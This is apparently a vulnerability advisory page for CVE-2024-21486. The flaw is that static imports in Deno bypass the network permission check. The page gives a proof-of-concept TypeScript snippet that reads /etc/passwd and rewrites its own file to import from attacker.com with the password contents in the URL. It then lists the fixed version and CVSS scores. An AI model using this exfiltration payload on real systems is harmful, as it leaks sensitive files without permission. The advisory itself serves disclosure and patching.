icon

We found results for “

CVE-2024-21486

Good to know:

icon

Date: August 19, 2025

### Summary\n\nStatic imports are exempted from the network permission check. An attacker could exploit this to leak the password file on the network.\n\n### Details\n\nStatic imports in Deno are exempted from the network permission check. This can be exploited by attackers in multiple ways, when third-party code is directly/indirectly executed with `deno run`:\n\n1. The simplest payload would be a tracking pixel-like import that attackers place in their code to find out when developers use the attacker-controlled code.\n2. When `--allow-write` and `--allow-read` permissions are given, an attacker can perform a sophisticated two-steps attack: first, they generate a ts/js file containing a static import and in a second execution load this static file.\n\n### PoC\n\n```ts\nconst __filename = new URL(\"\", import.meta.url).pathname;\nlet oldContent = await Deno.readTextFile(__filename);\nlet passFile = await Deno.readTextFile(\"/etc/passwd\");\nlet pre =\n 'import {foo} from \"[https://attacker.com?val=](https://attacker.com/?val=)' +\n encodeURIComponent(passFile) + '\";\\n';\nawait Deno.writeTextFile(__filename, pre + oldContent);\n```\n\nExecuting a file containing this payload twice, with `deno run --allow-read --allow-write` would cause the password file to leak on the network, even though no network permission was granted.\n\nThis vulnerability was fixed with the addition of the `--allow-import` flag: https://docs.deno.com/runtime/fundamentals/security/#network-access

Severity Score

Severity Score

Weakness Type (CWE)

Exposure of Sensitive Information to an Unauthorized Actor

CWE-200

Top Fix

icon

Upgrade Version

Upgrade to version deno - 2.0.0

Learn More

CVSS v3.1

Base Score:
Attack Vector (AV): NETWORK
Attack Complexity (AC): LOW
Privileges Required (PR): NONE
User Interaction (UI): NONE
Scope (S): UNCHANGED
Confidentiality (C): LOW
Integrity (I): NONE
Availability (A): NONE

Do you need more information?

Contact Us